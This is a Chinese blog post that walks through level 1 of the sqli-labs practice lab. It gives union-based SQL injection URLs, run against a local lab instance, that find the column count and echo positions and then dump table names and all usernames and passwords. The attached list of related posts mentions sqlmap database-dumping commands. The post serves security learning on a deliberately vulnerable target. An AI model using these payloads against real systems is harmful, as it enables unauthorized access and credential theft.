sqli-labs第一关:有回显位的提示信息注入

已于 2022-06-15 15:13:12 修改
阅读量611 收藏 1
点赞数 2
分类专栏: ctf web题 文章标签: sql mysql
于 2022-02-14 15:37:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51395584/article/details/122925355
版权

sqli-labs第一关:有回显位的提示信息注入

(一到四关的注入方式类似,只是SQL语句的闭合方式不同)

第一步:直接输入网址:
127.0.0.1/sqli-labs-master/Less-1/
在这里插入图片描述

第二步:设置id=1,确定是否与数据库有交互

     127.0.0.1/sqli-labs-master/Less-1/?id=1

在这里插入图片描述
第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示

http://127.0.0.1/sqli-labs-master/Less-1/?id=1 ' order by 4 --+

其中“'”为当前SQL语句(第一关)的闭合符号,需要使用一定的时间判断闭合符号。“–+”为MySQL中的注释符,使后面的SQL语句不会被执行,如下图可知,当前表格一共有3个字段,当数字为4时,页面报错

在这里插入图片描述
判断闭合符的方式可以使用一些特殊的字符,如“\”
*http://127.0.0.1/sqli-labs-master/Less-1/?id=1*
报错信息中可能会给出闭合符号。如下图的闭合符号是“')”
在这里插入图片描述

第四步:确定显示位

     http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+

利用联合查询语句,是前面的查询语句失效,然后利用select语出在表的添加一条临时的记录1,2,3,使页面显示对应的数字,从而判断网页中显示的是哪几个字段的数据信息。如下图,对应的信息显示位为2和3,可以知道,当前查询语句查询的是表格的第2,3个字段的内容。

在这里插入图片描述

第五步:在对应的位置编写SQL语句,进行SQL注入

     Database()

可以显示数据库名

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’
union select 1,database(),3 --+在这里插入图片描述

group_concat(table_name)
from information_Schema.tables where table_schema=‘security’

可以显示指定数据库中的所有表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’
union select 1,(group_concat(table_name)), 3 from information_Schema.tables where table_schema=‘security’
–+
在这里插入图片描述
(select group_concat(password)
from security.users)

显示字段名

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’
union select 1,(select group_concat(password) from security.users),
(select group_concat(username) from security.users) --+

上SQL语句的作用是查询security数据库中users表下password字段和name字段的所有内容
在这里插入图片描述
以上内容为个人学习的内容,如有错误请路过的大佬指正。

小皮hai
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap过sqli-labs-master以第一关为例
yj959595的博客
07-08 703
先把需要用到的命令列一下,方便使用。 sqlmap -u 注入点 –dbs 暴库 sqlmap -u 注入点 –current-user 当前使用的账户
sqli-labs-master.zip
05-26
Sqli-labs是专为学习SQL注入而设计的实战教程,由印度程序员创建,提供了一系列逐步升级的挑战,帮助用户从基础到高级理解SQL注入的原理和防御方法。在这个"SQL注入教程"中,你可以通过参与不同级别的实验,深入理解...
sqli-labs-master第一关
weixin_44932880的博客
07-20 1957
本篇是我做完第一题后的一些理解 首先将我了解的数据库的一些内容说一下 一个账户可以有多个数据库,每个数据库里可以建多个表,表里用字段来储存信息。 如图,localhost为本地账户,security等是数据库,security下面的emails等为表格, 而右边的id,email_id则为字段,字段下面就是储存的信息。 ...
sqli-labs提示和答案(含详细教程)
superprintf的博客
10-02 1638
前四关登录成功显示用户名,报错正常 第一关id=‘1’ 第二关id=1 第三关id=(‘1’) 第四关id=(“1”) 第五关和六关登录成功不显示用户名,报错正常 第五关id=‘1’ 第六关id=“1” 第七关登录成功不显示用户名,报错固定为You have an error in your SQL syntax 第七关id=((‘1’)) 第八关登录成功不显示用户名,不报错 第八关id=‘1’ 第九关登录成功或者失败只显示You are in… ...
sqli-labs-master第一关sql注入
你的小粉丝的博客
07-25 1244
先了解一下数据库 先登录账户,输入密码 之后可以看到N个数据库 打开数据库可以看到N个表 每个表里还有N个字段 除了用sql语句查看,当然也可以用MySQL等直接查看 开始步入正题 sql注入 url处先尝试着输入?id=1; 再尝试?id=2; ...
sqli-labs-master第一关:基于错误的GET单引号字符型注入
m_ing
05-07 441
前言:这几天时间就和大家一起研究sqli-labs-master,一起闯关。至于sqli-labs-master的环境搭建我这里就不演示了,可以参考https://blog.csdn.net/Litbai_zhang 的博客自行搭建。 首先来到第一关 http://192.168.89.131/sqli-labs-master/Less-1/ 都知道第一关是基于错误的get型注入 先来了解什么...
sqli-labs实验指导手册
最新发布
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
sqli-labs.rar
07-06
"sqli-labs"是一个专门用于学习和测试SQL注入技术的渗透靶场,由印度的安全研究者创建,为网络安全专业人士提供了一个实践和提升SQL注入防御能力的平台。 靶场通常包含一系列逐渐增加难度的挑战,让用户从基础到...
sqli-labs-php7-master.zip
04-06
sqli-labs-php7-master提供了一系列逐步升级的实验,涵盖了基础到高级的SQL注入技术,包括错误回显、盲注、时间基注入、联合查询等。 实验平台通常分为多个级别,每个级别都对应一个特定的漏洞,用户需要利用这些...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
Sqli-labs-master超详细通关教程(1-23关|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
【漏洞发现-sql注入】有回显注入--sqli-labs
m0_46344990的博客
05-16 954
一、漏洞描述 数据库是对用户数据进行存储以及删除等操作 ,功能是用来组织,存储和管理数据。比如我们网站每一个用户对应的用户名基本信息,账号密码等等,都在服务器用数据库保存。用户通过对网站的操作,请求返回给服务器,服务器将对应数据拿出来渲染在html中让用户使用。比如登录操作,输入账号密码后服务器会查询响应账户的密码是否对应,这些都需要在后端语言中用到sql语句。而黑客们通过传入数据使原本的sql语句拼接了其他语句,执行了其他的操作。就sql-labs中的一些关卡的漏洞,这里先介绍有回显的注...
mysql系统数据表如何回显_从mysql数据库中回显数据
weixin_39520013的博客
01-19 158
希望这个帮助$data=array();$data[] = array("chapter" => "2", "subchapter" => "2.1", "part" => "1" );$data[] = array("chapter" => "2", "sub...
回显是什么鬼?浅谈
一只叫做Unix的猫
01-25 1万+
linux c 里面出现了一个叫做tcgetattr 和tcsetattr的两个函数  他们的功能能是获取回显 以及设置回显 详解http://blog.chinaunix.net/uid-10747583-id-97303.html 那么什么是回显? 你在键盘上按下一个“键”,如果在电脑上同时显示出你按的内容,这就是回显;如果没有显示,就不回显。 典型的两个
(手工)【sqli-labs13-14】POST注入:报错回显(基本步骤)
07-07 788
SQL-POST】报错回显
sqli-labs 第一关
weixin_48800344的博客
08-31 769
sql注入大体解释 通过构造闭合语句来执行想要执行的命令 第一关 推荐工具 HackBar 为什么不用url输入,做着做着就不知道代码那里出错了,用hackber方便简洁,其实url输入也行 第一步:判断什么型的注入 1.判断是什么型注入就要看给他错误语句是否报错 例如:判断什么型注入直接看1’ and 1=2# 1 and 1=2#那个会报错 详细因为当运行可执行指令中假如程序有错误语句会报错,如果可执行程序中有错误语句但没报错就可以看出来了 我是这么理解的,希望有更好的解释 [外链图片转存失败
基于Sqli-Labs靶场的SQL注入-1~4关
Joker
11-11 1621
这里对SQL进行了初步的讲解,主要讲解了联合注入以及一些简单的注入类型判断,后续我会更新其他系列的注入方式,例如报错注入、二分法猜解注入、时间延迟注入、导出文件字符型注入、POST类型注入注入类型。
web渗透部分笔记(一)
学吧
06-20 447
web渗透笔记
SQL注入知识总结
ma963852的博客
03-30 9740
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
SQLi-LABS Page-1(Basic Challenges)
07-24
SQLi-LABS Page-1(Basic Challenges) 1-22关 附带多种方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值